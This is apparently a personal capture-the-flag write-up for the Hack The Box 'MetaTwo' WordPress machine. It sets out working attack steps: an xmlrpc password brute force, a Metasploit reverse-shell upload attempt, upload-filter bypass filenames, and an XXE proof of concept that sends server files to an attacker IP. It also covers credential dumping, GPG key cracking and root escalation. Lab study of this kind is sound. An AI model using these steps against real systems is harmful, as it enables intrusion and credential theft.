==
tags: #linux #easy #wordpress #sqli #sqlmap
=

* nmap
  #+begin_src bat
  sudo nmap -sV -sC -oA nmap/metatwo.basic 10.129.7.68

PORT   STATE SERVICE VERSION
21/tcp open  ftp?
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c4:b4:46:17:d2:10:2d:8f:ec:1d:c9:27:fe:cd:79:ee (RSA)
|   256 2a:ea:2f:cb:23:e8:c5:29:40:9c:ab:86:6d:cd:44:11 (ECDSA)
|_  256 fd:78:c0:b0:e2:20:16:fa:05:0d:eb:d8:3f:12:a4:ab (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to http://metapress.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  #+end_src
* ftp
  try anonymous
* http
  like the nmap output shows, the browser redirects to =metapress.htb=; so add that to =hosts=.
  this is a wordpress site; looking at source, we find:
  #+begin_src 
  <meta name="generator" content="WordPress 5.6.2" />
  #+end_src
** plugins
   #+begin_src bat
   curl -s http://metapress.htb/ | grep plugins
   #+end_src
   returns nothing
** themes
   #+begin_src bat
   curl -s http://metapress.htb/ | grep themes
   #+end_src
   from the output, we see the theme is =twentytwentyone=
** login form
   trying =/wp-admin=, we find that =admin= is a username which exists comparing the error message
   for a non-existent username
** wpscan 
   registered and got an api token:
   #+begin_src bat
   sudo wpscan --url http://metapress.htb --enumerate --api-token <wpscan.token>
   #+end_src
   finds the username =manager= in addition to =admin=
*** bruteforce wordpress password
   #+begin_src bat
   sudo wpscan --password-attack xmlrpc -t 20 -U manager -P /usr/share/wordlists/rockyou.txt --url http://metapress.htb

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - manager / partylikearockstar 
   #+end_src
* creds
  #+begin_src 
  manager: partylikearockstar
  #+end_src
  *these creds don't work on either ftp or ssh*
* msfconsole
  #+begin_src bat
  msf exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS metapress.htb
  msf exploit(unix/webapp/wp_admin_shell_upload) > set LHOST tun0
  msf exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME manager
  msf exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD partylikearockstar
  msf exploit(unix/webapp/wp_admin_shell_upload) > run

  [*] Started reverse TCP handler on 10.10.16.17:4444 
  [*] Authenticating with WordPress using manager:partylikearockstar...
  [+] Authenticated with WordPress
  [*] Preparing payload...
  [*] Uploading payload...
  [-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload
  [*] Exploit completed, but no session was created.
  #+end_src
  ok, this fails because we don't have admin access.
* media upload
  tried to upload a reverse shell but:
  #+begin_src 
  Sorry, this file type is not permitted for security reasons. 
  #+end_src
  let's try and fuzz for some filename that could work (from the [[file:d:/code/htb/academy/modules/file-upload-attacks/whitelist-filters.org::*Character Injection][whitelist filter section]])
   #+begin_src bash
   for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
       for ext in '.php' '.phps'; do
           echo "shell$char$ext.jpg" >> wordlist.txt
           echo "shell$ext$char.jpg" >> wordlist.txt
           echo "shell.jpg$char$ext" >> wordlist.txt
           echo "shell.jpg$ext$char" >> wordlist.txt
       done
   done
   #+end_src
   use the burp intruder to fuzz the filename in the request, but it fails to find a working
   version
* CVE-2021-29447
  this utilizes an XXE in the media upload functionality to exfiltrate files. there's a [[https://github.com/Val-Resh/CVE-2021-29447-POC/blob/main/CVE-2021-29447.py][POC]]:
  #+begin_src bat
  $ python CVE-2021-29447.py --url http://metapress.htb --server-ip 10.10.16.17 -u manager -p partylikearockstar 

  File to Exfiltrate:
  #+end_src
  there's an interesting entry in =/etc/hosts=:
  #+begin_src 
  127.0.1.1 meta2 metapress.htb
  #+end_src
  and =/etc/passwd= shows us a username:
  #+begin_src
  jnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bash
  #+end_src
  however, we're unable to access the user's private key if it exists.
** wp-config.php
   let's get the wordpress config file by entering =../wp-config.php=
   #+begin_src bash
   <?php
   /** The name of the database for WordPress */
   define( 'DB_NAME', 'blog' );

   /** MySQL database username */
   define( 'DB_USER', 'blog' );

   /** MySQL database password */
   define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' );

   /** MySQL hostname */
   define( 'DB_HOST', 'localhost' );

   /** Database Charset to use in creating database tables. */
   define( 'DB_CHARSET', 'utf8mb4' );

   /** The Database Collate type. Don't change this if in doubt. */
   define( 'DB_COLLATE', '' );

   define( 'FS_METHOD', 'ftpext' );
   define( 'FTP_USER', 'metapress.htb' );
   define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
   define( 'FTP_HOST', 'ftp.metapress.htb' );
   define( 'FTP_BASE', 'blog/' );
   define( 'FTP_SSL', false );
   #+end_src
* ftp
  download everthing
  wget -r /
  #+begin_src 
  wget -m --no-passive ftp://metapress.htb:9NYS_ii@FyL_p5M2NvJ@10.129.228.95
  #+end_src
  but wait, there's no need:
  #+begin_src bat
  $ ftp 10.129.228.95
    Name (10.129.228.95:kali): metapress.htb

ftp> ls

drwxr-xr-x   5 metapress.htb metapress.htb     4096 Oct  5  2022 blog
drwxr-xr-x   3 metapress.htb metapress.htb     4096 Oct  5  2022 mailer

ftp> cd mailer
ftp> dir

drwxr-xr-x   4 metapress.htb metapress.htb     4096 Oct  5  2022 PHPMailer
-rw-r--r--   1 metapress.htb metapress.htb     1126 Jun 22  2022 send_email.php 

ftp> get send_email.php
  #+end_src
  =send_email.php= has the following lines:
  #+begin_src bash
  $mail->Username = "jnelson@metapress.htb";
  $mail->Password = "Cb4_JmWM8zUZWMu@Ys";   
  #+end_src
* ssh creds
  #+begin_src 
  jnelson: Cb4_JmWM8zUZWMu@Ys
  #+end_src
* user flag
  #+begin_src 
  jnelson@meta2:~$ cat user.txt 

700a8644b1b30b3c34a6692cd2bda0cd
  #+end_src
* privesc
** sudo -l
   #+begin_src 
   Sorry, user jnelson may not run sudo on meta2.
   #+end_src
** db
   using the mysql creds discovered earlier, let's go through the database; there's a =wp-users=
   table with hashed creds for =admin= and =manager=; try hashcat with mode =400= to crack it, but
   it takes forever and is probably not the thing to do.
** setuid binaries
   #+begin_src 
   $ find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
   #+end_src
** linpeas
   the linpeas output shows the existence of something called =passpie=
   #+begin_src 
   Possible private SSH keys were found!
   /home/jnelson/.passpie/.keys
   #+end_src
** passpie
   this is essentially a commandline password manager which uses gpg to encrypt credentials;
   #+begin_src
   jnelson@meta2:~$ passpie

╒════════╤═════════╤════════════╤═══════════╕
│ Name   │ Login   │ Password   │ Comment   │
╞════════╪═════════╪════════════╪═══════════╡
│ ssh    │ jnelson │ ********   │           │
├────────┼─────────┼────────────┼───────────┤
│ ssh    │ root    │ ********   │           │
╘════════╧═════════╧════════════╧═══════════╛
   #+end_src
   trying to export/read the passwords failed because it asks for some passphrase which turns
   out is not the password of the =jnelson= user; 
   #+begin_src bat
   jnelson@meta2:~$ ls -la .passpie/
-r-xr-x--- 1 jnelson jnelson    3 Jun 26  2022 .config
-r-xr-x--- 1 jnelson jnelson 5243 Jun 26  2022 .keys 
   #+end_src
   the =.keys= file contains the private and public gpg keys in the same file:
   #+begin_src bat
   $ cat .passpie/.keys

-----BEGIN PGP PUBLIC KEY BLOCK-----

mQSuBGK4V9YRDADENdPyGOxVM7hcLSHfXg+21dENGedjYV1gf9cZabjq6v440NA1
AiJBBC1QUbIHmaBrxngkbu/DD0gzCEWEr2pFusr/Y3yY4codzmteOW...
   #+end_src
   so we can use =john= to crack it:
** john
   transfer it to the attack box and:
   #+begin_src bat
   $ gpg2john gpg.key > gpg_hash.txt

   $ cat gpg_hash.txt
Passpie:$gpg$*17*54*3072*e97....

   $ john --wordlist=/usr/share/wordlists/rockyou.txt gpg_hash.txt
   #+end_src
   this is successfully cracked revealing =blink182=; use this as the passphrase
** root flag
   #+begin_src bat
   jnelson@meta2:~$ passpie export root
Passphrase:

   jnelson@meta2:~$ ls
gpg.key  linpeas.sh  linpeas.txt  root  root.pass  user.txt

   jnelson@meta2:~$ cat root
credentials:
- comment: ''
  fullname: root@ssh
  login: root
  modified: 2022-06-26 08:58:15.621572
  name: ssh
  password: !!python/unicode 'p7qfAZt4_A1xo_0x'
- comment: ''
  fullname: jnelson@ssh
  login: jnelson
  modified: 2022-06-26 08:58:15.514422
  name: ssh
  password: !!python/unicode 'Cb4_JmWM8zUZWMu@Ys'
handler: passpie
version: 1.0

  jnelson@meta2:~$ su -
Password: 

  root@meta2:~# cat /root/root.txt 
aa4cdee3f168c09a2f873bdcdfe6a020
   #+end_src
* ippsec
** wpscan
   uses =aggressive= with =--detection-mode= and =--plugin-detection=
   #+begin_src bat
   wpscan --url metapress.htb --detection-mode aggressive --plugin-detection aggressive
   #+end_src
   this takes a really long time to run because it checks against each of ~10k plugins.
** vulnerable plugin
   the booking plugin which is active on the =/events= endpoint (we missed this with the curl
   query because it's not active on the root endpoint) has an unauthenticated SQLi
   vulnerability ([[https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357/][poc here]]) which he uses to fetch data from the known table =wp-users=;
